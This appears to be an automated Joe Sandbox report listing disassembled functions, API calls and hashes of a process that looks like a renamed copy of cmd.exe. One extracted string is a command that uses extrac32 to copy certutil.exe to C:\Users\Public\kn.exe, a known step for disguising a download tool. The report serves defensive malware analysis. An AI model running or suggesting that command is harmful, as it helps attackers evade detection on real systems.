                                      Function 00007FF755CA99F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9A39
                                        • Part of subcall function 00007FF755CADF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF755CACEAA), ref: 00007FF755CADFB8
                                        • Part of subcall function 00007FF755CADF60: RtlFreeHeap.NTDLL ref: 00007FF755CADFCC
                                        • Part of subcall function 00007FF755CADF60: _setjmp.MSVCRT ref: 00007FF755CAE03E
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9AF0
                                      • wcschr.MSVCRT(?,?,?,00007FF755CA99DD), ref: 00007FF755CA9B0F
                                        • Part of subcall function 00007FF755CA96E8: memset.MSVCRT ref: 00007FF755CA97B2
                                        • Part of subcall function 00007FF755CA96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA9880
                                      • _wcsupr.MSVCRT ref: 00007FF755CBB844
                                      • wcscmp.MSVCRT ref: 00007FF755CBB86D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                      • String ID: FOR$ IF
                                      • API String ID: 3663254013-2924197646
                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction ID: e1cee137eed4047d90fbb1acd914be3481e3e3adb89e0333467bd2b6e8c93142
                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                      • Instruction Fuzzy Hash: 1351C3AAF0964382FE55BB15D41117DAAA1AF84FACFCC8635D91E4B7D5DE3CE8018320
                                      Function 00007FF755CAF173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      • API String ID: 1959970872-2167043656
                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                      • Instruction ID: f3e009d78811d903e3f6911efb4efcff5cad7c53c18243614c22dca2f3d14744
                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                      • Instruction Fuzzy Hash: EC419EEFE0825785FBA4AB15E554379FAA0AF50F59FCC5835CA8D421A0DF3CA4818B20
                                      Function 00007FF755CCBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                      • String ID: %04X-%04X$:
                                      • API String ID: 930873262-1938371929
                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction ID: 8823e4d852b7f9c629d29d546a1c7fd6e4550f40bd673be64cd8a9642139b146
                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                      • Instruction Fuzzy Hash: C44192BBA08A8382EB60AB50E4502BAE7A0FB84F5CFC85135D95D436C5DF7CD545C720
                                      Function 00007FF755CB36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 3249344982-2616576482
                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction ID: 8ca40c52e5d191975eaa800fa16968c0116b32e12cfb034c79e7224a5e994b5d
                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                      • Instruction Fuzzy Hash: 46417FB7A18B8286E7109F12A84476AFBA4FB89FD8F884234DA4D57794CF3CD455CB10
                                      Function 00007FF755CB6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A73
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6A91
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AB0
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6AE3
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB68A3,?,?,?,?,?,?,?,00000000,?,00007FF755CB63F3), ref: 00007FF755CB6B01
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$iswdigit
                                      • String ID: +-~!$<>+-*/%()|^&=,
                                      • API String ID: 2770779731-632268628
                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction ID: 22bcf26c5ea5e2eb50abee0d847a8cca5cd59b831de802f88fd03dda360e83e1
                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                      • Instruction Fuzzy Hash: F8315DA7609A9785EB50AF01E450278B7F0FB89F99BD98135DA8E43354EF7CE844D320
                                      Function 00007FF755CCD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                      • String ID:
                                      • API String ID: 3192234081-0
                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                      • Instruction ID: 032da6cf92a24cccae1d06e76e2a790838cdd8c219abf91f7356d4712ae2910c
                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                      • Instruction Fuzzy Hash: C531B17A6086838BE750BF21E40527DFB91FB89F98F889634DE5A47791CE3CD4018B10
                                      Function 00007FF755CB1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1673
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB168D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1757
                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB176E
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB1788
                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF755CB14D6,?,?,?,00007FF755CAAA22,?,?,?,00007FF755CA847E), ref: 00007FF755CB179C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Alloc$Size
                                      • String ID:
                                      • API String ID: 3586862581-0
                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction ID: 9ec7009563c03dcca7ed8337ac911dc9e0d57b060b29ad4e3f1dea1665a70f92
                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                      • Instruction Fuzzy Hash: BD9159BBA09A4381EB51AB15E450379B6A0FB45FA8FDD8135CA5D477A0DF7CE881C320
                                      Function 00007FF755CB86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                      • String ID:
                                      • API String ID: 1313749407-0
                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction ID: 7ea52fa7f0625041a85fb23977ccf0d6cdf5a4c55a4f785003d734fcab4753dd
                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                      • Instruction Fuzzy Hash: B251B5ABA0868382EA50BB119818179E695BF45FACFCC5234DD1E677D1EF3CE840C660
                                      Function 00007FF755CCEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                      • String ID:
                                      • API String ID: 920682188-0
                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                      • Instruction ID: 910a1d418f8973fd5545b1441f78bf24199094f16b9565a58b6d2fdfb8bf5d4b
                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                      • Instruction Fuzzy Hash: B551367B705BC28AEB21EF20D8542E8B7A1FB89B89F888135CA4D47754EF3CD6458710
                                      Function 00007FF755CADF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF755CAE00B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess_setjmp
                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 777023205-3344945345
                                      • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                      • Instruction ID: 0852dbcd8e1fbc85ef5c56346f530bec9f14c9e9bb7043ef77d456b06571770b
                                      • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                      • Instruction Fuzzy Hash: 8A5158BBD0DA438AE651AB11E840179FAA0BF89F58FDC4839D90D423A1DF7CA441E660
                                      Function 00007FF755CAF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      • API String ID: 1959970872-2167043656
                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                      • Instruction ID: e1f9c827f8a112cca08e426da3a3489fa8f15a101ffb649dd37444dadb0682c2
                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                      • Instruction Fuzzy Hash: D0417CEFE0825786FBA47B14E554279BEA0AF10F4DFDC5836CA8D421A0DF3CA4418B60
                                      Function 00007FF755CC91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpfprintfwcsrchr
                                      • String ID: CMD Internal Error %s$%s$Null environment
                                      • API String ID: 3625580822-2781220306
                                      • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                      • Instruction ID: e3dcb3d6c8be0e26c59bb8be543552ea3ad440161ede71569de15eb7036b62cf
                                      • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                      • Instruction Fuzzy Hash: 1131C5ABA0868791EA14BB42A5001B9F6A0BF45F98FCC5134CD6E1B791DE3CF495C350
                                      Function 00007FF755CB1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcsspn
                                      • String ID:
                                      • API String ID: 3809306610-0
                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                      • Instruction ID: 0d3b0a31517391947aa2786687d44b300f34864798f2f146406e9ba29c14df00
                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                      • Instruction Fuzzy Hash: 9BB1A1BBA08B8782EA51AB55E450279B7A0FB45FA8FC88135CA4E47794DF7DD841C320
                                      Function 00007FF755CC8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$iswdigit$wcstol
                                      • String ID:
                                      • API String ID: 3841054028-0
                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                      • Instruction ID: 2ada084b7fa050f6bdc682851c07737e21957606d9087b4de23a0bbd6693178e
                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                      • Instruction Fuzzy Hash: 3F51C6ABA0465391EB64EF1594001BAB6A1FFA8F59BCC9231DE6D422D4DF3CE851C320
                                      Function 00007FF755CA5984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC3687
